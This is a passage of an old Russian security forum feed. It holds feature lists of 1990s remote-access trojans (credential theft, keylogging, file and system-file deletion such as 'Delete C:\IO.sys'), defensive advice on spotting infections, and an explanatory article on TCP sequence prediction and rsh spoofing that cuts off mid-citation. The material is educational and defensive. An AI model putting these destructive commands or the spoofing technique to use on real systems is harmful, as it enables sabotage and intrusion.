bitch!!!!!!!!!!!!!!' <br />Show Message-'Do u ready to fuck your system??????!!!' <br />Show Message-'ShutUp bitch!!!!!!!!!!' <br />Show Message-'Get ready to start!!!!!!' <br />Show Message-'Thats All bitch!!!!!!!!!' <br />Delete C:\Logo.sys <br />Delete C:\Windows\Win.com <br />Delete C:\IO.sys <br />Delete C:\Windows\System.ini <br />Delete C:\Windows\Win.ini <br />Delete C:\Config.sys <br />Delete C:\Autoexec.bat <br />Enable Paiting On The Screen('DIE!!! DIE!!! DIE!!!') <br />Disable Paiting On The Screen('DIE!!! DIE!!! DIE!!!') <br />Enable Creating Of Many Forms With Caption('DIE!!! DIE!!! DIE!!!') <br />Disable Creating Of Many Forms With Caption('DIE!!! DIE!!! DIE!!!') <br />Execute File <br />Change Desktop Colors <br />Send Message <br />Hide/Show Taskbar <br />Open/Close CDROM <br />Mouse Double Click On/Off <br />Get Windows, System &amp; Application Directory <br />Terminate Server <br />Reboot Computer <br />&quot;No Access&quot; for server <br />Self Removing Server <br />List Dialup parameters (phone, passwords...) <br />List ICQ UIN <br />Process List <br />Start FTP Server <br />Hides the victims TaskBar <br />Shows the victims taskBar <br />Starts an Program on the victims computer, program doesn't have to be an .EXE, it will start and file with it's default program too. <br />Opens the victims default Web Browser at the URL you specify <br />Opens the victims Control Panel <br />Opens the victims Date/Time Options <br />Opens the victims Appearence Options <br />Starts the victims Screen Saver <br />Closes the Server on the victims machine <br />Deletes a file you specify, from the victims machine <br />Reboots the victims computer <br />Deletes a WHOLE directory from the victims computer <br />Clears the victims recent folder (The Documents folder on the START menu) <br />Ends the current windows session <br />Forces a shutdown ! <br />Loggs the victim off his/her current windows session <br />Reads from the victims floppy drive <br />Sends a ping to the Server <br />Sends a Message to the victim <br />Returns the victims WINDOWS directory <br />Returns the victims TEMP Directory <br />Returns the path that the server is installed on <br />Returns the victims Hard Disk Letter <br />Returns the victims LOCAL TIME <br />Returns the victims OPEN WINDOWS <br />Maximises a window on the victims computer that you specify <br />Sets the victims Computer Name <br />Makes the victims Mouse &quot;CRAZY&quot; and uncontolable <br />Returns the victims Mouse to normal <br />Returns the vitims ICQ# <br />Lists all the files and any directory <br />Formats and drive on the victims Computer <br />Closes any window on the vitims Computer <br />Serches for a File, or a Pattern, on the vistims Computer <br />Sets the name of Drive C: <br />Sets the victims Computer Name <br />Sends text to and active input box on the victims computer <br />Creats a file on the victims Computer that fills up the entire drive <br />Returns the Registered User of that Computer <br />Returns the Registered Organization of that Computer <br />Returns the amount of free space on any drive <br />Returns the Operating System of the victims Computer <br />Returns the Serial Number of any Disk <br />Opens an FTP Server on the victims computer, gives you; List, Read Write, Delete, Make Dir, Delete Dir and Execute <br />information as text, that &quot;infected&quot; user enters to any window containing password field. <br />information aspasswords, which &quot;infected&quot; user enters to password fields. <br />send &quot;system&quot; messages to remote PC. <br />play sounds. <br />show bitmaps (.bmp pictures). <br />run exe files. <br />send &quot;victim&quot; to any URL. <br />change server's port. <br />hide GF Client with BOSSKEY=F12. <br />scan subnet for infected servers. <br />save windows list. <br />work with files and folders using GF filemanager. <br />Shutdown Remote Computer <br />Restart Remote Computer <br />Log-Off Remote Computer <br />Restart Remote Computer in MS-DOS <br />Close Remote Computer Spy <br />Remove Remote Computer Spy <br />Open Remote Computer CD-ROM <br />Close Remote Computer CD-ROM <br />Disconnect Remote Computer <br />Disable Ctrl+Alt+Del On Remote Computer <br />Enable Ctrl+Alt+Del On Remote Computer <br />Hide Remote Computer Taskbar <br />Show Remote Computer Taskbar <br />Turn Caps Lock On On Remote Computer <br />Turn Caps Lock Off On Remote Computer <br />Turn Num Lock On On Remote Computer <br />Turn Num Lock Off On Remote Computer <br />Change Remote Computer Computer Name <br />Change Remote Computer Recycling Bin Name <br />Swap Remote Computer Mouse Buttons <br />Unswap Remote Computer Mouse Buttons <br />Set Remote Computer Cursor Position <br />Show Remote Computer Cursor <br />Hide Remote Computer Cursor <br />Get Mouse Double Click Speed Of Remote Computer <br />Set Mouse Double Click Speed Of Remote Computer <br />Get Remote Computer Windows Mode <br />Get Remote Computer Amount Of Mouse Buttons <br />Get Remote Computer Windows Run Time <br />Get Remote Computer Free Space On C:\ <br />Get Current User Logged In On Remote Computer <br />Get Serial Number Of Drive C:\ On Remote Computer <br />Get Remote Computer Temp Directory <br />Get Remote Computer Windows Directory <br />Get Remote Computer Windows System Directory <br />Get Resolution Of Remote Computer <br />Set Resolution Of Remote Computer <br />Start Remote Computer Default Screen Saver <br />Set Remote Computer Start Menu Pop-up Speed <br />Add A Line To Remote Computer Autoexec.bat File <br />Get Percent Of Memory Used On Remote Computer <br />Get Number Of Bytes In Physical Memory Of Remote Computer <br />Get Available Bytes Of Physical Memory On Remote Computer <br />Get Total Memory Amount In Page File On Remote Computer <br />Get Available Memory Amount In Page File On Remote Computer <br />Get Total Amount Of Virtual Memory On Remote Computer <br />Get Available Amount Of Virtual Memory On Remote Computer <br />Pop-up Remote Computer Message <br />Delete Files <br />Copy Remote Computer Files <br />Rename Remote Computer Files <br />Create Remote Computer Files <br />Close Remote Computers Programs <br />Get List Of Running Remote Computer Programs <br />Set Spy Password On Remote Computer <br />Server Admin (set password, close server, restrict access) <br />Host Info (system info, cached passwords) <br />Message Manager <br />File Manager (create/delete folder, upload/download/delete file) <br />Window Manager <br />Registry Manager <br />Sound System Balance <br />Plugin Manager <br />Port Redirect <br />Application Redirect <br />File Actions (execute file, play sound, show image, open document, print document) <br />Spy Functions (keyboard listen, capture screen image, capture camera video, record sound) <br />Exit Windows (logoff, poweroff, reboot, shutdown) <br />Client chat <br />Open/Close CDROM <br />Keyboard (disable keys, key click, restore keys) <br />Mouse (swap buttons, resore buttons) <br />Go To URL <br />Send Text <br />Send message <br />Shutdown remote computer <br />Download files <br />Upload files <br />Delete files <br />Execute files <br />Create folders <br />Screeb capture <br />View process list <br />Kill process <br />tell the server to upload the specified local file via ftp to remote path <br />tell the server to download the specified remote file via ftp to local path <br />execute a file (show window, hide window) <br />change directory <br />list directory <br />create directory <br />remove directory <br />show current dir <br />copy file <br />move file <br />rename file <br />delete file <br />type the specified text file <br />shows an hexadecimal dump of the specified binary or text file <br />shows the specified message into a dialog box on the server <br />locks up the server <br />trashes the server and locks it up <br />create the specified registry key <br />deletes the specified registry key <br />deletes the specified registry value <br />determines if a key or a name exists <br />sets the currently open registry key <br />read the specified key's value <br />creates or updates the specified key and associated value <br />lists available keys in the currently open key <br />lists available values in the currently open key <br />terminates the current session only <br />terminates all connections and unloads the server <br />Log all of the Dial-Up Networking accounts on a remote computer <br />Capturing full-size screen <br />Kill any programm (window) <br />View help screen <br />Shutdown remote machine <br />Reboot remote machine <br />Logoff remote machine <br />Hide active window <br />Destroy active window <br />Kill window with matching title <br />List files in current directory <br />Change directory to [dir] <br />Execute DOS command <br />Launch application <br />Send message <br />Chat with remote <br />Enter notification mode <br />Sends some information - process list and more <br />Exits server <br />Disconnects you from server <br />Remove server from remote computer memory <br />Destroy the server autostart <br />Take rights on server <br />Change &amp; delete password <br />Send dialog box with OK button <br />Send dialog box with Yes/No buttons <br />Change folder <br />Make new folder <br />Remove folder <br />Delete files <br />List Files <br />Get current directory <br />Get logical drives <br />Lock/Unlock desktop <br />Make a puzzle with remote desktop <br />Stars On/Off on remote desktop <br />Hide/Show Start button <br />Hide/Show Taskbar <br />Hide/Show Desktop <br />Execute application (Normal/Minimized/Maximized/Hidden Status) <br />List/Kill 32 bit process <br />LogOff user <br />Reboot system <br />Shutdown system <br />Get user name <br />Get computer name <br />Get date &amp; time <br />Keyboard Lights Bomb <br />Lock/Unlock Mouse <br />Move Mouse <br />Monitor On/Off <br />Flip Screen <br />Open/Close CD-ROM Drive <br />Flood Server Printer <br />System Keys ON/OFF <br />Clipboard Lock <br />Screen Saver Bomb <br />Hide/Show Taskbar <br />Hide/Show Start Button <br />Disable/Enable Start Button <br />Active the Screen Saver <br />Remove Desktop Wallpaper <br />Change Desktop Wallpaper <br />Modify Remote Date <br />Close Server EXE <br />Delete Server EXE <br />Lock Up the System <br />Close all Programs <br />Exit Windows <br />Shutdown Windows <br />MSG Box [Chat] <br />Send Text <br />Get Server Information <br />View Remote Passwords <br />View Remote Netstat <br />View Active Process <br />Open Server Hard Disk <br />Play Wav Files <br />Delete and Execute Files <br />Modify Remote Autoexec.bat </p> <p>Также хотел привести некоторые мои наблюдения: </p> <p>Работа антивирусников (очень поверхностно, буду признателен за любые дополнения). </p> <p>1. Norton Antivirus при проверке моего диска, на котором находится архив имеющихся в моем распоряжении троянцев (80 mb), пищит и скринит на BO, NETBUS, Millenium и что то еще. </p> <p>2. McAfee как-то вяло реагировало на BO, кричало, било себя лицом об экран, но удалить не смогло или поленилось (y меня 3.x мотор от McAfee и я, если честно, мало им пользуюсь, не нравится он мне внешне:) Несимпатичный какой то антивирус ). </p> <p>Что касается обнаружения на nework у себя в конторе -- NetBus имеет встроенный, замечательный сканер, он сам вам все скажет. Для всех других я настроил сканнер, сохранил адреса портов, и оно себе бегает и бегает, когда надо кричит, бьет посуду и требует внимания к собственной персоне. </p> <p>Почему собственно все BO да NetBus -- опять же из моего личного опыта - из тысяч и тысяч попыток обнаружить у меня в сетях зараженный компьютер, добрые процентов 70 были направлены на поиск BO и NetBus. (Bo - windows 95, NetBus - 95/NT) </p> <p>Теперь об известных мне способах получения троянцев вне своего желания:) </p> <p>1. Любой self-extract архив типа zip, rar и так далее. Сначала ставит троян, потом себя куда прикажете </p> <p>2. Файлы для MS Word97 можете позвонить троянцу прямо с страницы. ( macros ) </p> <p>3. Понятное дело, любой download с веба, будь то гороскоп или открытка для мамы-папы, или от мамы-папы. </p> <p>4. Про ActiveX плугины и технологии я просто умолчу из страха потревожить эту тему. </p> <p>5. Понятное дело, всяческие приколки в виде рождественских бегающих по экрану елок с встроенным трояно-довеском, всевозможые емейлы от незнакомых но любящих вас людей. Диски с беспатными скрин-серверами бесплатно раздаваемые в downtown Washington, DC ... (когда следующий день задали вопрос распространителю, он бросил все эти диски и убежал, только пятки сверкали) </p> <p>Как провериться? </p> <p>1. Неплохо бы регулярно посмотривать, что у вас бегает на запуске NT или windows. Смотреть реестр, autoexec и startup. Если есть какой-то неизвестный Elki_palki.exe, и он там прописан - посмотрите внимательнее и разберитесь с проблеммой. </p> <p>2. Не советую ставить неизвестный софт с веба на серверах и особенно с админовскими правами (NT) </p> <p>3. Не забывайте про свой таск бар -- что там творится? что это за Elki_palki.exe? Для этого существует масса утилит, к примеру Microsoft Process Viewer Application, это приложение к VC++. Очень замечательная програмка. И покажет и накажет!:) </p> <p>4. В NT посматривайте за реестром, для этого есть к примеру Regmon for Windows NT/9x. Найти ее можно на <a href="http://www.sysinternals.com" rel="nofollow" target="_blank">http://www.sysinternals.com</a>. </p> <p>5. Смотрите за инсталляцией software, имейте лог полного инстала - там будет написано, что перед тем как создать директорию c:\Doom сначала был скопираван файл C:\Windows\system\patch.exe /nomsg и в регистрах была произведена запись о бракосочетании. Существует большое количество софта, помогающего вам просмотреть лог, например, &quot;InCtrl 3&quot; (&quot;InCtrl 3 lets you track system changes made by Windows 95 and Windows NT installation programs....&quot;) </p> <p>6. Иногда полезно посканить свой собственный компьютер на предмет чем слушаем, чем воду пьем, я имею в виду открытые порты. </p> <p>Как бороться? </p> <p>Существуют многие и многие виды автоматических удовлетворителей пользователей путем выуживания подлого врага с их компьютеров и публичного сжигания кнопкой YES в боксе &quot;Сжигать будем?&quot;. Я не то что бы не верю им, или думаю, что они-то и являются главным источником заразы, нет. Просто ну не люблю я, когда откуда-то берется &quot;Вася Пупкин и Co&quot; с трояндетектором. Также я не люблю, когда McAfee шлет мне длинные письма, с восторгом рассказывая, что у них обнаружено новое противоядие от только что ими изобретенного вируса. Словом -- полагайтесь на свою голову и не ленитесь. Смотрите, что ставите, куда ставите, откуда берете, и что оно и где пишет, как много есть ресурсов. И не будьте наивны, когда ваш сиди перестает играть, появляются msg на экране с воплями MUST DIE, и компьютер начинает очень тормозить! Найдите тому причину... </p> <p>Очень важно при наличии какого-либо серьезного признака присутствия инородного вмешательства оборвать свой телефонный провод (волокно, нетворк cable). И, перейдя на другую машину, а может и пользуясь ранее сохраненной на диске информацией, найти причину и устранить ее. Одним словом говоря -- лист имен файлов, предоставленный мной, поможет найти подлеца, а при наличии записи о нем в Регистрах в разделе RUN* наведет вас на очень конкретные мысли, надеюсь. </p> <p>Как велика возможность того, что меня будут сканить, и грозит ли мне это чем-либо? </p> <p>Ничем это вам не грозит, если вы не поражены &quot;недугом&quot;. Это как смотреть в пустой кошелек: кушать хочется, а денег нету. Другое дело - деньги положить туда можно (см. &quot;о способах получения&quot;), и тогда давайте все покушаем. Тем не менее, если вы часто онлайн и в публичных местах наподобие IRC, поставьте себе какой-либо порт смотритель. Внесите туда порты -- и в какой-то прекрасный день вы сможете увидеть IP адрес &quot;злостного хакера&quot; </p> <p>Группы риска: <br />1.IRC пользователи. <br />2.ICQ пользователи. <br />3.Получатели емейлов от незнакомых людей. <br />4.Пользователи неизвестного софта с неизвестных вебсайтов, выполняющего неизвестные вещи с неизвестной целью. <br />5.Пользователи больших сетей, по принципу -- не вы, так ваш сосед. <br />6.Коллекционеры чего угодно -- гифов, картинок, порнографии -- если вы сняли какой-либо самораскрывающийся архив с предметами вашей страсти, будте готовы, что кто то получил ваш айпи и спешит к вам утешить свои страсти. </p> <p>На этом, пожалуй, все...:) </p> <p>Желаю вам всего самого лучшего.</p> mybb@mybb.ru (2525) Wed, 05 Dec 2007 21:48:11 +0300 https://viktoro2007.apbb.ru/viewtopic.php?pid=22#p22 https://viktoro2007.apbb.ru/viewtopic.php?pid=21#p21 <p>Протокол TCP (Transmission Control Protocol) является одним из базовых протоколов транспортного уровня сети Internet. Этот протокол позволяет исправлять ошибки, которые могут возникнуть в процессе передачи пакетов, и является протоколом с установлением логического соединения - виртуального канала. По этому каналу передаются и принимаются пакеты с регистрацией их последовательности, осуществляется управление потоком пакетов, организовывается повторная передача искаженных пакетов, а в конце сеанса канал разрывается. При этом протокол TCP является единственным базовым протоколом из семейства TCP/IP, имеющим дополнительную систему идентификации сообщений и соединения. Именно поэтому протоколы прикладного уровня FTP и TELNET, предоставляющие пользователям удаленный доступ на хосты Internet, реализованы на базе протокола TCP. </p> <p>Для идентификации TCP-пакета в TCP-заголовке существуют два 32-разрядных идентификатора, которые также играют роль счетчика пакетов. Их названия - Sequence Number и Acknowledgment Number. Также нас будет интересовать поле, называемое Control Bit. Это поле размером 6 бит может содержать следующие командные биты (слева направо): </p> <p>URG: Urgent Pointer field significant<br />ACK: Acknowledgment field significant<br />PSH: Push Function<br />RST: Reset the connection<br />SYN: Synchronize sequence numbers<br />FIN: No more data from sender</p> <p>Далее рассмотрим схему создания TCP-соединения (Рис 1).</p> <p>Предположим, что хосту А необходимо создать TCP-соединение с хостом В. Тогда А посылает на В следующее сообщение:</p> <p>1. A -&gt; B: SYN, ISSa<br />Это означает, что в передаваемом A сообщении установлен бит SYN (synchronize sequence number), а в поле Sequence Number установлено начальное 32-битное значение ISSa (Initial Sequence Number).</p> <p>В отвечает:</p> <p>2. B -&gt; A: SYN, ACK, ISSb, ACK(ISSa+1)</p> <p>В ответ на полученный от А запрос В отвечает сообщением, в котором установлен бит SYN и установлен бит ACK; в поле Sequence Number хостом В устанавливается свое начальное значение счетчика - ISSb; поле Acknowledgment Number содержит значение ISSa, полученное в первом пакете от хоста А и увеличенное на единицу. </p> <p>А, завершая рукопожатие (handshake), посылает: </p> <p>3. A -&gt; B: ACK, ISSa+1, ACK(ISSb+1)</p> <p>В этом пакете установлен бит ACK; поле Sequence Number содержит ISSa + 1; поле Acknowledgment Number содержит значение ISSb + 1. Посылкой этого пакета на хост В заканчивается трехступенчатый handshake и TCP-соединение между хостами А и В считается установленным. </p> <p>Теперь хост А может посылать пакеты с данными на хост В по только что созданному виртуальному TCP-каналу: </p> <p>4. A -&gt; B: ACK, ISSa+1, ACK(ISSb+1); DATA</p> <p>Рис.1 Схема создания TCP-соединения</p> <p>Из рассмотренной выше схемы создания TCP-соединения видно, что единственными идентификаторами TCP-абонентов и TCP-соединения являются два 32-битных параметра Sequence Number и Acknowledgment Number. Следовательно, для формирования ложного TCP-пакета атакующему необходимо знать текущие идентификаторы для данного соединения - ISSa и ISSb. Проблема возможной подмены TCP-сообщения становится еще более важной, так как анализ протоколов FTP и TELNET, реализованных на базе протокола TCP, показал, что проблема идентификации FTP и TELNET-пакетов целиком возлагается данными протоколами на транспортный уровень, то есть на TCP. Это означает, что атакующему достаточно, подобрав соответствующие текущие значения идентификаторов TCP-пакета для данного TCP-соединения (например, данное соединение может представлять собой FTP или TELNET подключение), послать пакет с любого хоста в сети Internet от имени одного из участников данного соединения (например, от имени клиента) и данный пакет будет воспринят как верный! К тому же, так как FTP и TELNET не проверяют IP-адреса отправителей, от которых им приходят сообщения, то, в ответ на полученный ложный пакет, FTP или TELNET-сервер отправит ответ на указанный в ложном пакете настоящий IP-адрес атакующего, то есть атакующий начнет работу с FTP или TELNET сервером со своего IP-адреса, но с правами легально подключившегося пользователя, который, в свою очередь, потеряет связь с сервером из-за рассогласования счетчиков! </p> <p>Итак, для осуществления описанной выше атаки необходимым и достаточным условием является знание двух текущих 32-битных параметров ISSa и ISSb, идентифицирующих TCP-соединение. Рассмотрим возможные способы их получения. В том случае, когда атакующий находится в одном сегменте с целью атаки или через его сегмент проходит трафик предполагаемого объекта атаки, то задача получения значений ISSa и ISSb является тривиальной и решается путем анализа сетевого трафика. Следовательно, надо четко понимать, что протокол TCP позволяет в принципе защитить соединение только в случае невозможности перехвата атакующим сообщений, передаваемых по данному соединению, то есть в случае нахождения атакующего в других сегментах относительно абонентов TCP-соединения. </p> <p>Поэтому наибольший интерес для нас представляют межсегментные атаки, когда атакующий и его цель находятся в разных сегментах сети. В этом случае задача получения значений ISSa и ISSb не является тривиальной. Далее предлагается следующее решение данной проблемы.</p> <p>1. Математическое предсказание начального значения идентификатора TCP-соединения экстраполяцией его предыдущих значений<br />Первый вопрос, который возникает в данном случае: как сетевая операционная система формирует начальное значение ISSa ( так называемый ISN - Initial Sequence Number)? Очевидно, что наилучшим решением с точки зрения безопасности будет генерация этого значения ISN по случайному закону с использованием программного (а лучше аппаратного) генератора псевдослучайных чисел с достаточно большим периодом. В этом случае каждое новое значение ISN не будет зависть от его предыдущего значения, а, следовательно, у атакующего не будет даже теоретической возможности нахождения функционального закона получения ISN. </p> <p>Однако оказывается, что подобные очевидные правила случайной генерации ISN как для составителей самого описания протокола TCP (RFC 793), так и для разработчиков сетевого ядра различных операционных систем являются далеко не очевидными. Об этом говорят следующие факты. В описании протокола TCP в RFC 793 рекомендуется увеличивать значение этого 32-битного счетчика на 1 каждые 4 микросекунды (?!). А как дело обстоит на практике? Поверьте, плохо! Например, в ранних Berkeley-совместимых ядрах ОС UNIX значение этого счетчика увеличивалось на 128 каждую секунду и на 64 для каждого нового соединения. Анализ исходных текстов ядра ОС Linux 1.2.8. показал, что значение ISN вычисляется данной ОС в зависимости от текущего времени по следующему отнюдь не случайному закону:</p> <p>(1) ISN = mcsec + sec*1000000, где <br />mcsec - время в микросекундах; <br />sec - текущее время в секундах, причем отсчет его идет от 1970 года.<br />Вы думаете, что в других сетевых ОС лучше? Ошибаетесь! В ОС Windows NT 4.0 значение ISN увеличивается на 10 примерно каждую миллисекунду. То есть для Windows NT справедлива следующая формула: </p> <p>(2) ISN = msec*10, где <br />msec - время в миллисекундах. <br />Однако больше всего автора удивил защищенный по классу B1 UNIX, установленный на многопроцессорной миниЭВМ - полнофункциональном файрволе. Эта наиболее защищенная из всех, что встречалась автору, сетевая ОС имеет также простой времязависимый алгоритм генерации начального значения идентификатора TCP - соединения. Как говорится, комментарии здесь излишни. Мало того, что в единственном базовом &quot;защищенном&quot;(?!) протоколе Internet - протоколе TCP, применяется простейший способ идентификации соединения, который в принципе не позволяет гарантировать надежную защиту от подмены одного из абонентов при нахождении атакующего в том же сегменте, так еще и сами разработчики сетевых ОС разрушают и без того хрупкую безопасность этого протокола, используя простые времязависимые алгоритмы генерации ISN! </p> <p>Итак, в том случае, если в сетевой операционной системе используется времязависимый алгоритм генерации начального значения идентификатора TCP-соединения, то атакующий получает принципиальную возможность определить с той или иной степенью точности вид функции, описывающей закон получения ISN. Исходя из практических исследований сетевых ОС, а также из общих теоретических соображений можно предложить следующий обобщенный вид функции, описывающий времязависимый закон получения ISN:</p> <p>(3) ISN = F(mсsec, msec, sec), где <br />mcsec - время в микросекундах (обычно, в зависимости от аппаратного обеспечения компьютера, минимальной единицей измерения машинного времени является микросекунда - в обычных IBM это так). Этот параметр циклически изменяется за секунду от 0 до 106 - 1 <br />msec - время в миллисекундах. Циклически изменяется за секунду от 0 до 999. <br />sec - время в секундах. Постоянно увеличивается каждую секунду.<br />Исходя из формулы (3), а также из того, что микросекунда обычно является минимальной единицей измерения машинного времени в сетевой ОС, можно для удобства аппроксимации свернуть формулу (3) до следующего вида: </p> <p>(4) ISN = F(mсsec) </p> <p>Таким образом мы пришли к тому, что в общем случае можно считать, что значение ISN зависит от микросекунд. Данная функция (4) в силу особенностей изменения своих аргументов обычно в сетевых ОС является или кусочнонепрерывной (непрерывной на отдельных интервалах изменения аргумента) или ступенчатой. Например зависимость (1), описывающая закон получения ISN в ОС Linux, в случае приведения ее к виду (4) является кусочнолинейной, а функциональная зависимость (2), справедливая для Windows NT, - дискретной. </p> <p>Итак, определившись с единицами измерения ISN и обобщенным времязависимым законом его генерации (3)-(4), мы вплотную подошли к проблеме определения вида функциональной зависимости ISN от параметра mcsec для конкретной сетевой ОС. Первый способ получения этой зависимости - анализ исходных текстов ядра операционной системы. Использование данного способа на практике обычно оказывается невозможным из-за отсутствия исходных текстов большинства ОС. Исключение составляют ОС Linux и FreeBSD, поставляемые с исходными текстами ядра. </p> <p>В связи с этим предлагается другой метод получения закона изменения ISN от параметра mcsec. В этом случае сетевая ОС рассматривается исследователем как &quot;черный ящик&quot;, к которому применяется метод тестирования &quot;запрос-ответ&quot;: на исследуемую сетевую ОС передается серия обычных запросов на создание TCP-соединения и принимается соответствующие количество ответов с текущими значениями ISN операционной системы в каждый момент времени. При этом замеряются временные интервалы (в микросекундах) прихода ответов на запросы, то есть за какое время после отправки запроса на него придет ответ и время, прошедшее между запросами. В результате исследователем будет получена следующая таблица дискретных отсчетов ISN и соответствующих им моментов времени в мксек.: </p> <p>ISN0 ISN1 ... ISNn <br />t0 t1 ... tn </p> <p>где ISNn - значение ISN, полученное за время tn от начала эксперимента (время начала эксперимента принимается за 0). Аппроксимируя данную таблицу дискретных значений непрерывной функцией одним из известных математических методов (наименьших квадратов, например), получим с погрешностью, сравнимой с погрешностью исходных данных, непрерывную функцию изменения ISN от t, справедливую на данном временном промежутке (от 0 до tn): </p> <p>(5) ISN(t) = F(t); </p> <p>Эта формула в общем случае позволяет нам по предыдущему значению ISN, зная функцию изменения ISN от времени, получить следующее значение ISN. Теперь, используя данное равенство (5), атакующий может, получив в ответ на TCP-запрос текущее значение ISN для ОС в данный момент времени, математически предсказать следующее возможное значение ISN через некоторый промежуток времени. </p> <p>Хотелось бы обратить внимание на следующий важный момент: чем ближе в сети находятся исследователь и тестируемая ОС, тем выше точность получения аппроксимирующей функции, так как в противном случае время за которое запрос дойдет до системы и будет выработан ISN может существенно отличаться из-за задержек в канале связи от времени передачи ответа обратно. При этом погрешность исходных данных будет увеличиваться, а точность экстраполяции - падать. </p> <p>Заметим, что атакующему вовсе не обязательно проводить подобные исследования с интересующим его удаленным хостом. Достаточно только узнать тип операционной системы на предполагаемой цели атаки и получить в свое распоряжение подобную систему для определения формулы изменения ISN в данной ОС.</p> <p>Что касается практических результатов, то применение описанной выше методики получения формулы ISN(t) на примере ОС Linux 1.2.8 и Windows NT 4.0 в случае нахождения в одном сегменте с данными ОС позволило определить это 32-битное значение (от 0 до 232) по его предыдущему значению для ОС Windows NT с точностью до 10, а для ОС Linux 1.2.8 с точностью примерно до 100. В следующей таблице приведены снятые в процессе эксперимента с ОС Linux 1.2.8 значения изменения ISN (а не абсолютные значения) за соответствующие промежутки времени:</p> <p>t, мкс. 2759 5685 8560 11462 14303 <br />dISN 65135 134234 202324 270948 338028 </p> <p>Таблица изменения значения ISN для ОС Linux 1.2.8 </p> <p>Следующий график, построенный по значениям из данной таблицы и справедливый для ОС Linux 1.2.8, наглядно показывает линейный характер изменения значения начального идентификатора TCP - соединения ISN на данном временном промежутке (на самом деле зависимость изменения ISN для ОС Linux 1.2.8 носит кусочно-линейный характер): </p> <p>Зависимость изменения ISN от времени для Linux 1.2.8</p> <p>В общем случае определив вид функций для вычисления ISN в операционных системах на сервере и предполагаемом клиенте, атакующий начинает следить за ОС сервера, ожидая подключения предполагаемого клиента. В тот момент времени, когда подключение произошло, атакующий может подсчитать возможный диапазон значений ISN, которыми обменялись при создании TCP-канала данные хосты. Так как атакующий может вычислить значения ISN только приближенно, то ему не избежать подбора. Однако, если не проводить описанный выше анализ, то для перебора всех возможных значений ISSa и ISSb понадобилось бы послать 264 пакетов, что нереально. В случае использования описанного выше анализа в зависимости от полученной степени точности и удаления атакующего от хостов потребуется послать значительно меньшее число пакетов. Например, если удалось вычислить значения ISN на операционных системах с точностью до 100, то атакующему для подмены одного из абонентов TCP-соединения достаточно послать всего 100*100 пакетов. </p> <p>Далее рассмотрим ставшую уже классической удаленную атаку на r-службу, осуществление которой связано с описанными выше особенностями идентификации TCP-пакетов. </p> <p>2. Использование недостатков идентификации абонентов TCP-соединения для атаки на rsh-сервер<br />В ОС UNIX существует понятие: доверенный хост. Доверенным по отношению к данному хосту называется сетевой компьютер, доступ на который пользователю с данного хоста возможен без его аутентификации и идентификации с помощью r-службы (r - сокращение от англ. &quot;remote&quot; - удаленный). Обычно в ОС UNIX существует файл rhosts, в котором находится список имен и IP-адресов доверенных хостов. Для получения к ним удаленного доступа пользователю необходимо воспользоваться программами, входящими в r-службу (например, rlogin, rsh и.т.д.). В этом случае при использовании r-программ с доверенного хоста пользователю для получения удаленного доступа не требуется проходить стандартную процедуру идентификации и аутентификации, заключающуюся в проверке его логического имени и пароля. Единственной аутентифицирующей пользователя информацией для r-службы является IP-адрес хоста, с которого пользователь осуществляет удаленный r-доступ. Отметим, что все программы из r-службы реализованы на базе протокола TCP. Одной из программ, входящих в r-службу, является rsh, с помощью которой возможно осуществление данной атаки. Программа rsh (remoute shell) позволяет отдавать команды shell удаленному хосту. При этом (что является чрезвычайно важным в данном случае!) для того, чтобы отдать команду, достаточно послать запрос, но необязательно получать на него ответ. При атаке на r-службу вся сложность для атакующего заключается в том, что ему необходимо послать пакет от имени доверенного хоста, то есть в качестве адреса отправителя необходимо указать IP-адрес доверенного хоста. Следовательно, ответный пакет будет отправлен именно на доверенный хост, а не на хост атакующего. </p> <p>Схема удаленной атаки на rsh-сервер была впервые описана небезызвестным Р.Т. Моррисом-старшим (не младшим!). Она заключается в следующем (схема атаки изображена на Рис. 2.):</p> <p>Пусть хост А доверяет хосту В. Хост X-Hacker - это станция атакующего. </p> <p>Вначале атакующий X-Hacker открывает настоящее TCP - соединение с хостом В на любой TCP-порт (mail, echo и.т.д.). В результате X-Hacker получит текущее значение на данный момент времени ISNb. Далее, X-Hacker от имени А посылает на В TCP-запрос на открытие соединения:</p> <p>1. X-Hacker (A) -&gt; B: SYN, ISSx</p> <p>Получив этот запрос, В анализирует IP-адрес отправителя и решает, что пакет пришел с хоста А. Следовательно, В в ответ посылает на А новое значение ISNb':</p> <p>2. B -&gt; A: SYN, ACK, ISNb', ACK(ISSx+1)</p> <p>X-Hacker никогда не получит это сообщение от В, но, используя предыдущее значение ISNb и схему для получения ISNb' при помощи математического предсказания, может послать на В: </p> <p>3. X-Hacker (A) -&gt; B: ACK, ISSx+1, ACK(ISNb'+1) Отметим, что для того, чтобы послать этот пакет, возможно потребуется перебрать некоторое количество возможных значений ACK(ISSb' + 1), но не потребуется подбор ISSx + 1, так как этот параметр TCP-соединения был послан с хоста X-Hacker на В в первом пакете. </p> <p>В случае осуществления данной атаки перед атакующим возникает следующая проблема. Так как X-Hacker посылает пакет (1) на В от имени A, то хост B ответит на A пакетом (2). А, так как хост A не посылал на хост B никакого пакета с запросом, то A, получив ответ от B, перешлет на B пакет с битом RST - закрыть соединение. Атакующего с хоста X-Hacker это естественно не устраивает, поэтому одной из атак, целью которых является нарушение работоспособности системы, X-Hacker должен вывести из строя на некоторое время хост A. </p> <p>В итоге rsh-сервер на хосте В считает, что к нему подключился пользователь с доверенного хоста А, а на самом деле это атакующий с хоста X-Hacker. И хотя X-Hacker никогда не сможет получить пакеты с хоста В, но он сможет выполнять на нем команды (r-команды).</p> <p>Рис.2 Подмена одного из участников TCP-соединения при атаке на rsh-сервер</p> <p>В заключение автору хотелось бы привести пример реального инцидента, происшедшего в Суперкомпьютерном центре в Сан-Диего 12 декабря 1994 года, когда атакующий (небезызвестный Кевин Митник) использовал описанную выше схему удаленной атаки. Данный инцидент представляет, как кажется автору, исторический интерес и показывает что опасности, описанные в этой статье, являются отнюдь не мнимыми угрозами из Internet, а той реальностью, над которой большинство пользователей просто не задумывается и которая в любой момент может пожаловать к ним в гости. </p> <p>Все описанные ниже сведения взяты из письма эксперта по информационной безопасности Цутому Шимомуры (Tsutomu Shimomura) в различные эхо-конференции. </p> <p>Далее приводится перевод его оригинального письма с некоторыми сокращениями и авторскими комментариями: </p> <p>&quot;From: tsutomu@ariel.sdsc.edu (Tsutomu Shimomura)<br />Newsgroups: comp.security.misc,comp.protocols.tcp-ip,alt.security<br />Subject: Technical details of the attack described by Markoff in NYT<br />Date: 25 Jan 1995 04:36:37 -0800<br />Organization: San Diego Supercomputer Center<br />Message-ID: 